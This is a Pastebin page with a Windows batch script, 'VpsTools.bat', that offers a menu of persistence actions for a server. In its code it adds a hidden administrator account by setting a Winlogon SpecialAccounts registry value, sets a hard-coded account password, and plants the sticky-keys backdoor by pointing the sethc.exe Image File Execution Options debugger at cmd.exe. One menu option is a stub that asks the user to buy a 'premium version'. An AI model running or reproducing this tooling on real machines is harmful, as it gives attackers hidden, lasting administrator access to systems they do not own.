Advertisement
JohnGalt14

VpsTools.bat

Oct 30th, 2019
888
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 2.15 KB | None | 0 0
  1. echo off
  2. color 3
  3. cls
  4. :MENU
  5. ECHO.
  6. ECHO                              
  7. ECHO.
  8. ECHO                                    
  9. ECHO.
  10. ECHO                                          
  11. ECHO.
  12. ECHO                                          
  13. ECHO.                                  
  14. ECHO                                
  15. ECHO.
  16. ECHO  1- Change Password
  17. ECHO  2- Create Hidden User
  18. ECHO  3- Set Password Default = Hosnix_Dl
  19. ECHO  4- Create Backdoor
  20. echo  5- Delete Backdoor
  21. echo  6- Set password on Backdoor
  22. ECHO.
  23. SET /P M=Choice the number then press ENTER:
  24. IF %M%==1 GOTO ChangePass
  25. IF %M%==2 GOTO HiddenUser
  26. IF %M%==3 GOTO SetPass
  27. IF %M%==4 GOTO CreateBackdoor
  28. IF %M%==5 GOTO DeleteBackdoor
  29. IF %M%==6 GOTO SetPasswordBackdoor
  30.  
  31. :ChangePass
  32. cls
  33. REM "@Hosnix_Dl / Change Password"
  34. REM ------------------------------
  35. @echo off
  36. set /p user=Please Enter Your Username:
  37. set /p pass=Please Enter Desired Password:
  38. net user %user% %pass%
  39. GOTO MENU
  40.  
  41. :HiddenUser
  42. cls
  43. REM "@Hosnix_Dl / Create Hidden User"
  44. REM ------------------------------
  45. @echo off
  46. set /p user=Please Enter Desired Username:
  47. set /p pass=Please Enter Desired Password:
  48. net user /add %user% %pass%
  49. net localgroup administrators /add %user%
  50. reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v %user% /t REG_DWORD /d 0
  51. GOTO MENU
  52.  
  53. :SetPass
  54. cls
  55. REM "@Hosnix_Dl / Set Password Default"
  56. REM ------------------------------
  57. @echo off
  58. net user Cisco _Cisco_
  59. GOTO MENU
  60.  
  61. :CreateBackdoor
  62. cls
  63. REM "@Hosnix_Dl / Create Backdoor"
  64. REM ------------------------------
  65. @echo off
  66. REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe
  67. GOTO MENU
  68.  
  69. :DeleteBackdoor
  70. cls
  71. REM "@Hosnix_Dl / Delete Backdoor"
  72. REM ------------------------------
  73. @echo off
  74. REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
  75. GOTO MENU
  76.  
  77. :SetPasswordBackdoor
  78. cls
  79. REM "@Hosnix_Dl / Delete Backdoor"
  80. REM ------------------------------
  81. @echo off
  82. echo This Command there is Premium Verison. Please Buy Permium Verison
  83. GOTO MENU
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement